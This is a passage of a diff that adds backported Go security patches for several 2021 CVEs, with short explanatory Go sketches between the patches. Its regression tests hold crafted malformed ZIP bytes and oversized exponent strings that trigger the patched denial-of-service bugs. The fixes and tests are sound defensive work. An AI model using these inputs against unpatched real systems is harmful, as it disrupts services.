++ 0x00, 0x00, 0x00, 0x6b, 0x00, 0x00, 0x00, 0x00,
++ 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x50,
++ 0x4b, 0x05, 0x06, 0x00, 0x00, 0x00, 0x00, 0xff,
++ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
++ 0xff, 0xff, 0xff, 0x00, 0x00,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++
++ // Also check that an archive containing a handful of empty
++ // files doesn't cause an issue
++ b := bytes.NewBuffer(nil)
++ w := NewWriter(b)
++ for i := 0; i < 5; i++ {
++ _, err := w.Create("")
++ if err != nil {
++ t.Fatalf("Writer.Create failed: %s", err)
++ }
++ }
++ if err := w.Close(); err != nil {
++ t.Fatalf("Writer.Close failed: %s", err)
++ }
++ r, err := NewReader(bytes.NewReader(b.Bytes()), int64(b.Len()))
++ if err != nil {
++ t.Fatalf("NewReader failed: %s", err)
++ }
++ if len(r.File) != 5 {
++ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
++ }
++}
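
The guard added above can be read in isolation: a central directory record occupies at least 30 bytes, so an archive of a given size cannot plausibly contain more than size/30 records, and a larger claimed count is simply not used for preallocation. A small sketch of that arithmetic (note that the later CVE-2021-39293 patch in this series additionally guards the subtraction against underflow):

package main

import "fmt"

// safeToPreallocate mirrors the guard added in the patch above: only trust
// the claimed record count if the archive is large enough to actually hold
// that many 30-byte (or larger) headers.
func safeToPreallocate(archiveSize, directorySize, directoryRecords uint64) bool {
	return (archiveSize-directorySize)/30 >= directoryRecords
}

func main() {
	// A tiny archive claiming 1<<63 files must not drive the allocation.
	fmt.Println(safeToPreallocate(1024, 100, 1<<63)) // false
	fmt.Println(safeToPreallocate(1024, 100, 5))     // true
}
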
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
new file mode 100644
index 0000000000..2052b1d3db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33197.patch
@@ -0,0 +1,152 @@
+From cbd1ca84453fecf3825a6bb9f985823e8bc32b76 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Fri, 21 May 2021 14:02:30 -0400
+Subject: [PATCH] [release-branch.go1.15] net/http/httputil: always remove
+ hop-by-hop headers
+
+Previously, we'd fail to remove the Connection header from a request
+like this:
+
+ Connection:
+ Connection: x-header
+
+Updates #46313
+Fixes #46314
+Fixes CVE-2021-33197
+
+Change-Id: Ie3009e926ceecfa86dfa6bcc6fe14ff01086be7d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321929
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/323091
+Run-TryBot: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-33197
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/net/http/httputil/reverseproxy.go | 22 ++++----
+ src/net/http/httputil/reverseproxy_test.go | 63 +++++++++++++++++++++-
+ 2 files changed, 70 insertions(+), 15 deletions(-)
+
+Index: go/src/net/http/httputil/reverseproxy.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy.go
++++ go/src/net/http/httputil/reverseproxy.go
+@@ -221,22 +221,18 @@ func (p *ReverseProxy) ServeHTTP(rw http
+ // important is "Connection" because we want a persistent
+ // connection, regardless of what the client sent to us.
+ for _, h := range hopHeaders {
+- hv := outreq.Header.Get(h)
+- if hv == "" {
+- continue
+- }
+- if h == "Te" && hv == "trailers" {
+- // Issue 21096: tell backend applications that
+- // care about trailer support that we support
+- // trailers. (We do, but we don't go out of
+- // our way to advertise that unless the
+- // incoming client request thought it was
+- // worth mentioning)
+- continue
+- }
+ outreq.Header.Del(h)
+ }
+
++ // Issue 21096: tell backend applications that care about trailer support
++ // that we support trailers. (We do, but we don't go out of our way to
++ // advertise that unless the incoming client request thought it was worth
++ // mentioning.) Note that we look at req.Header, not outreq.Header, since
++ // the latter has passed through removeConnectionHeaders.
++ if httpguts.HeaderValuesContainsToken(req.Header["Te"], "trailers") {
++ outreq.Header.Set("Te", "trailers")
++ }
++
+ // After stripping all the hop-by-hop connection headers above, add back any
+ // necessary for protocol upgrades, such as for websockets.
+ if reqUpType != "" {
+Index: go/src/net/http/httputil/reverseproxy_test.go
+===================================================================
+--- go.orig/src/net/http/httputil/reverseproxy_test.go
++++ go/src/net/http/httputil/reverseproxy_test.go
+@@ -91,8 +91,9 @@ func TestReverseProxy(t *testing.T) {
+
+ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
+ getReq.Host = "some-name"
+- getReq.Header.Set("Connection", "close")
+- getReq.Header.Set("Te", "trailers")
++ getReq.Header.Set("Connection", "close, TE")
++ getReq.Header.Add("Te", "foo")
++ getReq.Header.Add("Te", "bar, trailers")
+ getReq.Header.Set("Proxy-Connection", "should be deleted")
+ getReq.Header.Set("Upgrade", "foo")
+ getReq.Close = true
+@@ -236,6 +237,64 @@ func TestReverseProxyStripHeadersPresent
+ }
+ }
+
++func TestReverseProxyStripEmptyConnection(t *testing.T) {
++ // See Issue 46313.
++ const backendResponse = "I am the backend"
++
++ // someConnHeader is some arbitrary header to be declared as a hop-by-hop header
++ // in the Request's Connection header.
++ const someConnHeader = "X-Some-Conn-Header"
++
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ if c := r.Header.Values("Connection"); len(c) != 0 {
++ t.Errorf("handler got header %q = %v; want empty", "Connection", c)
++ }
++ if c := r.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++ w.Header().Add("Connection", "")
++ w.Header().Add("Connection", someConnHeader)
++ w.Header().Set(someConnHeader, "should be deleted")
++ io.WriteString(w, backendResponse)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ frontend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ proxyHandler.ServeHTTP(w, r)
++ if c := r.Header.Get(someConnHeader); c != "should be deleted" {
++ t.Errorf("handler modified header %q = %q; want %q", someConnHeader, c, "should be deleted")
++ }
++ }))
++ defer frontend.Close()
++
++ getReq, _ := http.NewRequest("GET", frontend.URL, nil)
++ getReq.Header.Add("Connection", "")
++ getReq.Header.Add("Connection", someConnHeader)
++ getReq.Header.Set(someConnHeader, "should be deleted")
++ res, err := frontend.Client().Do(getReq)
++ if err != nil {
++ t.Fatalf("Get: %v", err)
++ }
++ defer res.Body.Close()
++ bodyBytes, err := ioutil.ReadAll(res.Body)
++ if err != nil {
++ t.Fatalf("reading body: %v", err)
++ }
++ if got, want := string(bodyBytes), backendResponse; got != want {
++ t.Errorf("got body %q; want %q", got, want)
++ }
++ if c := res.Header.Get("Connection"); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", "Connection", c)
++ }
++ if c := res.Header.Get(someConnHeader); c != "" {
++ t.Errorf("handler got header %q = %q; want empty", someConnHeader, c)
++ }
++}
++
+ func TestXForwardedFor(t *testing.T) {
+ const prevForwardedFor = "client ip"
+ const backendResponse = "I am the backend"
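
The essential point of the change above is that hop-by-hop headers are now deleted unconditionally, rather than skipped when their value happens to be empty. A standalone sketch of that stripping step; the header list is meant to mirror the one ReverseProxy uses and should be treated as illustrative:

package main

import (
	"fmt"
	"net/http"
)

// hopHeaders approximates httputil's hop-by-hop header list. The point of
// the patch above is that these are removed even when a header is present
// with an empty value (e.g. "Connection:").
var hopHeaders = []string{
	"Connection", "Proxy-Connection", "Keep-Alive", "Proxy-Authenticate",
	"Proxy-Authorization", "Te", "Trailer", "Transfer-Encoding", "Upgrade",
}

func stripHopByHop(h http.Header) {
	for _, name := range hopHeaders {
		h.Del(name) // Del removes the header whether its value is empty or not
	}
}

func main() {
	h := http.Header{}
	h.Add("Connection", "")
	h.Add("Connection", "x-header")
	h.Set("X-Header", "kept")
	stripHopByHop(h)
	fmt.Println(h)
}
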
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
new file mode 100644
index 0000000000..241c08dad7
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-33198.patch
@@ -0,0 +1,113 @@
+From c8866491ac424cdf39aedb325e6dec9e54418cfb Mon Sep 17 00:00:00 2001
+From: Robert Griesemer <gri@golang.org>
+Date: Sun, 2 May 2021 11:27:03 -0700
+Subject: [PATCH] math/big: check for excessive exponents in Rat.SetString
+
+CVE-2021-33198
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/df9ce19db6df32d94eae8760927bdfbc595433c3]
+CVE: CVE-2021-33198
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+
+
+Found by OSS-Fuzz https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=33284
+
+Thanks to Emmanuel Odeke for reporting this issue.
+
+Updates #45910
+Fixes #46305
+Fixes CVE-2021-33198
+
+Change-Id: I61e7b04dbd80343420b57eede439e361c0f7b79c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/316149
+Trust: Robert Griesemer <gri@golang.org>
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Robert Griesemer <gri@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+(cherry picked from commit 6c591f79b0b5327549bd4e94970f7a279efb4ab0)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321831
+Run-TryBot: Katie Hockman <katie@golang.org>
+Reviewed-by: Roland Shoemaker <roland@golang.org>
+---
+ src/math/big/ratconv.go | 15 ++++++++-------
+ src/math/big/ratconv_test.go | 25 +++++++++++++++++++++++++
+ 2 files changed, 33 insertions(+), 7 deletions(-)
+
+diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
+index e8cbdbe..90053a9 100644
+--- a/src/math/big/ratconv.go
++++ b/src/math/big/ratconv.go
+@@ -51,7 +51,8 @@ func (z *Rat) Scan(s fmt.ScanState, ch rune) error {
+ // An optional base-10 ``e'' or base-2 ``p'' (or their upper-case variants)
+ // exponent may be provided as well, except for hexadecimal floats which
+ // only accept an (optional) ``p'' exponent (because an ``e'' or ``E'' cannot
+-// be distinguished from a mantissa digit).
++// be distinguished from a mantissa digit). If the exponent's absolute value
++// is too large, the operation may fail.
+ // The entire string, not just a prefix, must be valid for success. If the
+ // operation failed, the value of z is undefined but the returned value is nil.
+ func (z *Rat) SetString(s string) (*Rat, bool) {
+@@ -174,6 +175,9 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ return nil, false
+ }
+ }
++ if n > 1e6 {
++ return nil, false // avoid excessively large exponents
++ }
+ pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
+ if exp5 > 0 {
+ z.a.abs = z.a.abs.mul(z.a.abs, pow5)
+@@ -186,15 +190,12 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
+ }
+
+ // apply exp2 contributions
++ if exp2 < -1e7 || exp2 > 1e7 {
++ return nil, false // avoid excessively large exponents
++ }
+ if exp2 > 0 {
+- if int64(uint(exp2)) != exp2 {
+- panic("exponent too large")
+- }
+ z.a.abs = z.a.abs.shl(z.a.abs, uint(exp2))
+ } else if exp2 < 0 {
+- if int64(uint(-exp2)) != -exp2 {
+- panic("exponent too large")
+- }
+ z.b.abs = z.b.abs.shl(z.b.abs, uint(-exp2))
+ }
+
+diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
+index b820df4..e55e655 100644
+--- a/src/math/big/ratconv_test.go
++++ b/src/math/big/ratconv_test.go
+@@ -590,3 +590,28 @@ func TestIssue31184(t *testing.T) {
+ }
+ }
+ }
++
++func TestIssue45910(t *testing.T) {
++ var x Rat
++ for _, test := range []struct {
++ input string
++ want bool
++ }{
++ {"1e-1000001", false},
++ {"1e-1000000", true},
++ {"1e+1000000", true},
++ {"1e+1000001", false},
++
++ {"0p1000000000000", true},
++ {"1p-10000001", false},
++ {"1p-10000000", true},
++ {"1p+10000000", true},
++ {"1p+10000001", false},
++ {"1.770p02041010010011001001", false}, // test case from issue
++ } {
++ _, got := x.SetString(test.input)
++ if got != test.want {
++ t.Errorf("SetString(%s) got ok = %v; want %v", test.input, got, test.want)
++ }
++ }
++}
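
With the limits above in place, Rat.SetString simply reports failure for absurdly large exponents instead of attempting a huge computation or panicking. A small usage sketch based on the test table in the patch:

package main

import (
	"fmt"
	"math/big"
)

func main() {
	for _, s := range []string{"1e+1000000", "1e+1000001", "1p-10000001"} {
		var r big.Rat
		// SetString reports ok=false when the exponent exceeds the new limits.
		_, ok := r.SetString(s)
		fmt.Printf("%-12s ok=%v\n", s, ok)
	}
}
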
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
new file mode 100644
index 0000000000..8fb346d622
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-34558.patch
@@ -0,0 +1,51 @@
+From a98589711da5e9d935e8d690cfca92892e86d557 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 9 Jun 2021 11:31:27 -0700
+Subject: [PATCH] crypto/tls: test key type when casting
+
+When casting the certificate public key in generateClientKeyExchange,
+check the type is appropriate. This prevents a panic when a server
+agrees to a RSA based key exchange, but then sends an ECDSA (or
+other) certificate.
+
+Fixes #47143
+Fixes CVE-2021-34558
+
+Thanks to Imre Rad for reporting this issue.
+
+Change-Id: Iabccacca6052769a605cccefa1216a9f7b7f6aea
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1116723
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-by: Katie Hockman <katiehockman@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/334031
+Trust: Filippo Valsorda <filippo@golang.org>
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport
+https://github.com/golang/go/commit/a98589711da5e9d935e8d690cfca92892e86d557
+CVE: CVE-2021-34558
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ src/crypto/tls/key_agreement.go | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+Index: go/src/crypto/tls/key_agreement.go
+===================================================================
+--- go.orig/src/crypto/tls/key_agreement.go
++++ go/src/crypto/tls/key_agreement.go
+@@ -67,7 +67,11 @@ func (ka rsaKeyAgreement) generateClient
+ return nil, nil, err
+ }
+
+- encrypted, err := rsa.EncryptPKCS1v15(config.rand(), cert.PublicKey.(*rsa.PublicKey), preMasterSecret)
++ rsaKey, ok := cert.PublicKey.(*rsa.PublicKey)
++ if !ok {
++ return nil, nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
++ }
++ encrypted, err := rsa.EncryptPKCS1v15(config.rand(), rsaKey, preMasterSecret)
+ if err != nil {
+ return nil, nil, err
+ }
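
The fix above is the standard comma-ok type assertion: verify that the certificate key really is RSA before using it, and fail with an error instead of panicking. A self-contained sketch of the same check, exercised with an ECDSA key:

package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/rsa"
	"errors"
	"fmt"
)

// rsaPublicKey shows the comma-ok assertion the patch adds: a non-RSA
// certificate key yields an error rather than a runtime panic.
func rsaPublicKey(pub interface{}) (*rsa.PublicKey, error) {
	key, ok := pub.(*rsa.PublicKey)
	if !ok {
		return nil, errors.New("tls: server certificate contains incorrect key type for selected ciphersuite")
	}
	return key, nil
}

func main() {
	ecKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if _, err := rsaPublicKey(&ecKey.PublicKey); err != nil {
		fmt.Println(err) // an ECDSA key is rejected instead of causing a panic
	}
}
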
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
new file mode 100644
index 0000000000..9c00d4ebb2
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-36221.patch
@@ -0,0 +1,101 @@
+From b7a85e0003cedb1b48a1fd3ae5b746ec6330102e Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 7 Jul 2021 16:34:34 -0700
+Subject: [PATCH] net/http/httputil: close incoming ReverseProxy request body
+
+Reading from an incoming request body after the request handler aborts
+with a panic can cause a panic, because http.Server does not (contrary
+to its documentation) close the request body in this case.
+
+Always close the incoming request body in ReverseProxy.ServeHTTP to
+ensure that any in-flight outgoing requests using the body do not
+read from it.
+
+Updates #46866
+Fixes CVE-2021-36221
+
+Change-Id: I310df269200ad8732c5d9f1a2b00de68725831df
+Reviewed-on: https://go-review.googlesource.com/c/go/+/333191
+Trust: Damien Neil <dneil@google.com>
+Reviewed-by: Brad Fitzpatrick <bradfitz@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/b7a85e0003cedb1b48a1fd3ae5b746ec6330102e
+CVE: CVE-2021-36221
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/net/http/httputil/reverseproxy.go | 9 +++++
+ src/net/http/httputil/reverseproxy_test.go | 39 ++++++++++++++++++++++
+ 2 files changed, 48 insertions(+)
+
+diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
+index 5d39955d62d15..8b63368386f43 100644
+--- a/src/net/http/httputil/reverseproxy.go
++++ b/src/net/http/httputil/reverseproxy.go
+@@ -235,6 +235,15 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
+ if req.ContentLength == 0 {
+ outreq.Body = nil // Issue 16036: nil Body for http.Transport retries
+ }
++ if outreq.Body != nil {
++ // Reading from the request body after returning from a handler is not
++ // allowed, and the RoundTrip goroutine that reads the Body can outlive
++ // this handler. This can lead to a crash if the handler panics (see
++ // Issue 46866). Although calling Close doesn't guarantee there isn't
++ // any Read in flight after the handle returns, in practice it's safe to
++ // read after closing it.
++ defer outreq.Body.Close()
++ }
+ if outreq.Header == nil {
+ outreq.Header = make(http.Header) // Issue 33142: historical behavior was to always allocate
+ }
+diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
+index 1898ed8b8afde..4b6ad77a29466 100644
+--- a/src/net/http/httputil/reverseproxy_test.go
++++ b/src/net/http/httputil/reverseproxy_test.go
+@@ -1122,6 +1122,45 @@ func TestReverseProxy_PanicBodyError(t *testing.T) {
+ rproxy.ServeHTTP(httptest.NewRecorder(), req)
+ }
+
++// Issue #46866: panic without closing incoming request body causes a panic
++func TestReverseProxy_PanicClosesIncomingBody(t *testing.T) {
++ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
++ out := "this call was relayed by the reverse proxy"
++ // Coerce a wrong content length to induce io.ErrUnexpectedEOF
++ w.Header().Set("Content-Length", fmt.Sprintf("%d", len(out)*2))
++ fmt.Fprintln(w, out)
++ }))
++ defer backend.Close()
++ backendURL, err := url.Parse(backend.URL)
++ if err != nil {
++ t.Fatal(err)
++ }
++ proxyHandler := NewSingleHostReverseProxy(backendURL)
++ proxyHandler.ErrorLog = log.New(io.Discard, "", 0) // quiet for tests
++ frontend := httptest.NewServer(proxyHandler)
++ defer frontend.Close()
++ frontendClient := frontend.Client()
++
++ var wg sync.WaitGroup
++ for i := 0; i < 2; i++ {
++ wg.Add(1)
++ go func() {
++ defer wg.Done()
++ for j := 0; j < 10; j++ {
++ const reqLen = 6 * 1024 * 1024
++ req, _ := http.NewRequest("POST", frontend.URL, &io.LimitedReader{R: neverEnding('x'), N: reqLen})
++ req.ContentLength = reqLen
++ resp, _ := frontendClient.Transport.RoundTrip(req)
++ if resp != nil {
++ io.Copy(io.Discard, resp.Body)
++ resp.Body.Close()
++ }
++ }
++ }()
++ }
++ wg.Wait()
++}
++
+ func TestSelectFlushInterval(t *testing.T) {
+ tests := []struct {
+ name string
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
new file mode 100644
index 0000000000..24ceabf808
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-38297.patch
@@ -0,0 +1,97 @@
+From 4548fcc8dfd933c237f29bba6f90040a85922564 Mon Sep 17 00:00:00 2001
+From: Michael Knyszek <mknyszek@google.com>
+Date: Thu, 2 Sep 2021 16:51:59 -0400
+Subject: [PATCH] [release-branch.go1.16] misc/wasm, cmd/link: do not let
+ command line args overwrite global data
+
+On Wasm, wasm_exec.js puts command line arguments at the beginning
+of the linear memory (following the "zero page"). Currently there
+is no limit for this, and a very long command line can overwrite
+the program's data section. Prevent this by limiting the command
+line to 4096 bytes, and in the linker ensuring the data section
+starts at a high enough address (8192).
+
+(Arguably our address assignment on Wasm is a bit confusing. This
+is the minimum fix I can come up with.)
+
+Thanks to Ben Lubar for reporting this issue.
+
+Change by Cherry Mui <cherryyz@google.com>.
+
+For #48797
+Fixes #48799
+Fixes CVE-2021-38297
+
+Change-Id: I0f50fbb2a5b6d0d047e3c134a88988d9133e4ab3
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1205933
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/354591
+Trust: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Heschi Kreinick <heschi@google.com>
+
+CVE: CVE-2021-38297
+
+Upstream-Status: Backport:
+https://github.com/golang/go/commit/4548fcc8dfd933c237f29bba6f90040a85922564
+
+Inline of ctxt.isWAsm following this implementation:
+https://github.com/golang/go/blob/4548fcc8dfd933c237f29bba6f90040a85922564/src/cmd/link/internal/ld/target.go#L127
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ misc/wasm/wasm_exec.js | 7 +++++++
+ src/cmd/link/internal/ld/data.go | 11 ++++++++++-
+ 2 files changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/misc/wasm/wasm_exec.js b/misc/wasm/wasm_exec.js
+index 82041e6bb901..a0a264278b1b 100644
+--- a/misc/wasm/wasm_exec.js
++++ b/misc/wasm/wasm_exec.js
+@@ -564,6 +564,13 @@
+ offset += 8;
+ });
+
++ // The linker guarantees global data starts from at least wasmMinDataAddr.
++ // Keep in sync with cmd/link/internal/ld/data.go:wasmMinDataAddr.
++ const wasmMinDataAddr = 4096 + 4096;
++ if (offset >= wasmMinDataAddr) {
++ throw new Error("command line too long");
++ }
++
+ this._inst.exports.run(argc, argv);
+ if (this.exited) {
+ this._resolveExitPromise();
+diff --git a/src/cmd/link/internal/ld/data.go b/src/cmd/link/internal/ld/data.go
+index 52035e96301c..54a1d188cdb9 100644
+--- a/src/cmd/link/internal/ld/data.go
++++ b/src/cmd/link/internal/ld/data.go
+@@ -2330,6 +2330,11 @@ func assignAddress(ctxt *Link, sect *sym.Section, n int, s loader.Sym, va uint64
+ return sect, n, va
+ }
+
++// On Wasm, we reserve 4096 bytes for zero page, then 4096 bytes for wasm_exec.js
++// to store command line args. Data sections starts from at least address 8192.
++// Keep in sync with wasm_exec.js.
++const wasmMinDataAddr = 4096 + 4096
++
+ // address assigns virtual addresses to all segments and sections and
+ // returns all segments in file order.
+ func (ctxt *Link) address() []*sym.Segment {
+@@ -2339,10 +2344,14 @@ func (ctxt *Link) address() []*sym.Segment {
+ order = append(order, &Segtext)
+ Segtext.Rwx = 05
+ Segtext.Vaddr = va
+- for _, s := range Segtext.Sections {
++ for i, s := range Segtext.Sections {
+ va = uint64(Rnd(int64(va), int64(s.Align)))
+ s.Vaddr = va
+ va += s.Length
++
++ if ctxt.Arch.Family == sys.Wasm && i == 0 && va < wasmMinDataAddr {
++ va = wasmMinDataAddr
++ }
+ }
+
+ Segtext.Length = va - uint64(*FlagTextAddr)
+ \ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
new file mode 100644
index 0000000000..88fca9cad9
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-39293.patch
@@ -0,0 +1,79 @@
+From 6c480017ae600b2c90a264a922e041df04dfa785 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <roland@golang.org>
+Date: Wed, 18 Aug 2021 11:49:29 -0700
+Subject: [PATCH] [release-branch.go1.16] archive/zip: prevent preallocation
+ check from overflowing
+
+If the indicated directory size in the archive header is so large that
+subtracting it from the archive size overflows a uint64, the check on
+the indicated number of files in the archive can be effectively
+bypassed. Prevent this from happening by checking that the indicated
+directory size is less than the size of the archive.
+
+Thanks to the OSS-Fuzz project for discovering this issue and to
+Emmanuel Odeke for reporting it.
+
+Fixes #47985
+Updates #47801
+Fixes CVE-2021-39293
+
+Change-Id: Ifade26b98a40f3b37398ca86bd5252d12394dd24
+Reviewed-on: https://go-review.googlesource.com/c/go/+/343434
+Trust: Roland Shoemaker <roland@golang.org>
+Run-TryBot: Roland Shoemaker <roland@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+(cherry picked from commit bacbc33439b124ffd7392c91a5f5d96eca8c0c0b)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/345409
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+Trust: Cherry Mui <cherryyz@google.com>
+
+https://github.com/golang/go/commit/6c480017ae600b2c90a264a922e041df04dfa785
+CVE: CVE-2021-39293
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/archive/zip/reader.go | 2 +-
+ src/archive/zip/reader_test.go | 18 ++++++++++++++++++
+ 2 files changed, 19 insertions(+), 1 deletion(-)
+
+diff --git a/src/archive/zip/reader.go b/src/archive/zip/reader.go
+index ddef2b7b5a517..801d1313b6c32 100644
+--- a/src/archive/zip/reader.go
++++ b/src/archive/zip/reader.go
+@@ -105,7 +105,7 @@ func (z *Reader) init(r io.ReaderAt, size int64) error {
+ // indicate it contains up to 1 << 128 - 1 files. Since each file has a
+ // header which will be _at least_ 30 bytes we can safely preallocate
+ // if (data size / 30) >= end.directoryRecords.
+- if (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
++ if end.directorySize < uint64(size) && (uint64(size)-end.directorySize)/30 >= end.directoryRecords {
+ z.File = make([]*File, 0, end.directoryRecords)
+ }
+ z.Comment = end.comment
+diff --git a/src/archive/zip/reader_test.go b/src/archive/zip/reader_test.go
+index 471be27bb1004..99f13345d8d06 100644
+--- a/src/archive/zip/reader_test.go
++++ b/src/archive/zip/reader_test.go
+@@ -1225,3 +1225,21 @@ func TestCVE202133196(t *testing.T) {
+ t.Errorf("Archive has unexpected number of files, got %d, want 5", len(r.File))
+ }
+ }
++
++func TestCVE202139293(t *testing.T) {
++ // directory size is so large, that the check in Reader.init
++ // overflows when subtracting from the archive size, causing
++ // the pre-allocation check to be bypassed.
++ data := []byte{
++ 0x50, 0x4b, 0x06, 0x06, 0x05, 0x06, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x4b,
++ 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
++ 0x00, 0x00, 0x00, 0x50, 0x4b, 0x05, 0x06, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
++ 0xff, 0x50, 0xfe, 0x00, 0xff, 0x00, 0x3a, 0x00, 0x00, 0x00, 0xff,
++ }
++ _, err := NewReader(bytes.NewReader(data), int64(len(data)))
++ if err != ErrFormat {
++ t.Fatalf("unexpected error, got: %v, want: %v", err, ErrFormat)
++ }
++}
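
The one-line change above is about operation ordering on unsigned integers: check that the claimed directory size fits inside the archive before subtracting, because uint64 subtraction wraps on underflow and would otherwise defeat the per-record sanity check introduced for CVE-2021-33196. A minimal sketch:

package main

import "fmt"

// canPreallocate shows the ordering fixed by the patch above: reject a
// directory size that does not fit in the archive before doing the
// subtraction used in the per-record check.
func canPreallocate(size, directorySize, directoryRecords uint64) bool {
	if directorySize >= size {
		return false // claimed directory larger than the whole archive
	}
	return (size-directorySize)/30 >= directoryRecords
}

func main() {
	// Without the first check, 100-200 would wrap to a huge value and the
	// per-record sanity check would be bypassed.
	fmt.Println(canPreallocate(100, 200, 1<<40)) // false
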